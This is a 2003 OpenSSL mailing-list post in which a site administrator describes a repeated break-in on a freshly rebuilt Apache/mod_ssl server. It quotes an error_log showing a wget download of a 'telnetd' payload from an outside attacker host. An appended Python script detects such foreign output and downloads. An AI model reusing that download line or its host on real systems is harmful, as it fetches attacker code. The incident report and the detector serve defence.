Our site has recently been successfully attacked twice. The first time we probably deserved it, as we were running on old software, and hadn't been fixing vulnerabilities regularly. So we reformatted the disks, installed Apache 1.3.29, PHP 4.3.4, and OpenSSL 0.9.7c, and patched the kernel bug that let the swines get root after the first time they got in.

Feeling more secure, we brought Apache up, and carried on with business. Just a couple of hours after bringing up Apache, we got the following entries in the main server error log:

[Sat Dec 20 17:49:24 2003] [notice] Apache/1.3.29 (Unix) PHP/4.3.4 mod_ssl/2.8.16 OpenSSL/0.9.7c configured -- resuming normal operations
[Sat Dec 20 17:49:24 2003] [notice] Accept mutex: sysvsem (Default: sysvsem)
--20:41:46-- http://www.viperhaxu.hpg.com.br/telnetd
=> `telnetd'
Resolving www.viperhaxu.hpg.com.br... done.
Connecting to www.viperhaxu.hpg.com.br[200.226.137.9]:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.viperhaxu.hpg.ig.com.br/telnetd [following]
--20:41:47-- http://www.viperhaxu.hpg.ig.com.br/telnetd
=> `telnetd'
Resolving www.viperhaxu.hpg.ig.com.br... done.
Connecting to www.viperhaxu.hpg.ig.com.br[200.226.137.12]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 170,613 [text/plain]


0K .......... .......... .......... .......... .......... 30% 52.74 KB/s
50K .......... .......... .......... .......... .......... 60% 187.27 KB/s
100K .......... .......... .......... .......... .......... 90% 49.55 KB/s
150K .......... ...... 100% 156.74 KB/s


20:41:50 (71.51 KB/s) - `telnetd' saved [170613/170613]
<snip>

Which was more or less the same way the first attack started. Since all the information I can find on the net seems to say 0.9.7c fixes the known vulnerabilities, and even the hackers themselves seem to think they are only capable of breaking 0.9.6x versions (they are very proud, they publish their photographs on the net, and give detailed instructions on how to exploit), I am wondering if we somehow didn't do the build correctly. Apache certainly seems to think the build was o.k. from the log, and the libssl.so that was loaded has 0.9.7c everywhere inside it.

I am ready to restart Apache once again, but would be grateful for any advice as to the best way to proceed - I really don't feel like reinstalling from scratch a 3rd time.

Best regards. . . Fred.
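Added example, not part of Fred's post or of the OpenSSL project: the wget transcript above landed in error_log because a command run by an httpd child inherits httpd's stderr, and its output carries no Apache `[date] [level]` prefix. This Python check separates genuine Apache entries from such foreign output and extracts any completed wget transfers, using the log lines quoted in the post as its sample input.

```python
"""Find non-Apache output (e.g. a wget transcript) inside an Apache 1.3 error_log."""
import re

# Apache 1.3 error_log prefix: "[Sat Dec 20 17:49:24 2003] [notice] ..."
APACHE_LINE = re.compile(
    r"^\[[A-Z][a-z]{2} [A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d \d{4}\] \[\w+\]")
# wget start-of-transfer line: "--20:41:46-- http://host/path"
WGET_START = re.compile(r"^--\d\d:\d\d:\d\d--\s+(\S+)")
# wget completion line: "20:41:50 (71.51 KB/s) - `telnetd' saved [170613/170613]"
WGET_SAVED = re.compile(r"- `([^']+)' saved \[(\d+)/(\d+)\]")

# Sample input: the error_log lines quoted in the post (the <snip> marker omitted).
SAMPLE_LOG = """[Sat Dec 20 17:49:24 2003] [notice] Apache/1.3.29 (Unix) PHP/4.3.4 mod_ssl/2.8.16 OpenSSL/0.9.7c configured -- resuming normal operations
[Sat Dec 20 17:49:24 2003] [notice] Accept mutex: sysvsem (Default: sysvsem)
--20:41:46-- http://www.viperhaxu.hpg.com.br/telnetd
=> `telnetd'
Resolving www.viperhaxu.hpg.com.br... done.
Connecting to www.viperhaxu.hpg.com.br[200.226.137.9]:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.viperhaxu.hpg.ig.com.br/telnetd [following]
--20:41:47-- http://www.viperhaxu.hpg.ig.com.br/telnetd
=> `telnetd'
Resolving www.viperhaxu.hpg.ig.com.br... done.
Connecting to www.viperhaxu.hpg.ig.com.br[200.226.137.12]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 170,613 [text/plain]
0K .......... .......... .......... .......... .......... 30% 52.74 KB/s
50K .......... .......... .......... .......... .......... 60% 187.27 KB/s
100K .......... .......... .......... .......... .......... 90% 49.55 KB/s
150K .......... ...... 100% 156.74 KB/s
20:41:50 (71.51 KB/s) - `telnetd' saved [170613/170613]
"""

def scan(lines):
    """Count Apache vs. foreign lines and list completed wget downloads.

    A foreign line is any non-blank line without the Apache prefix; a
    download is recorded as (final_url, saved_name, bytes) when a wget
    'saved' line follows a start-of-transfer line (redirects keep the
    last URL seen, so the 302 target above is what gets reported)."""
    report = {"apache": 0, "foreign": 0, "downloads": []}
    last_url = None
    for raw in lines:
        s = raw.rstrip("\n")
        if not s.strip():
            continue
        if APACHE_LINE.match(s):
            report["apache"] += 1
            continue
        report["foreign"] += 1
        m = WGET_START.match(s)
        if m:
            last_url = m.group(1)
            continue
        m = WGET_SAVED.search(s)
        if m and last_url:
            report["downloads"].append((last_url, m.group(1), int(m.group(2))))
            last_url = None
    return report
```

Any foreign line in error_log is worth an alert on its own; a recorded download means a process running as the web server user fetched and wrote a file, which is the point at which the host should be treated as compromised rather than restarted.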



______________________________________________________________________
OpenSSL Project                                 http://www.openssl.org
User Support Mailing List                    [EMAIL PROTECTED]
Automated List Manager                           [EMAIL PROTECTED]
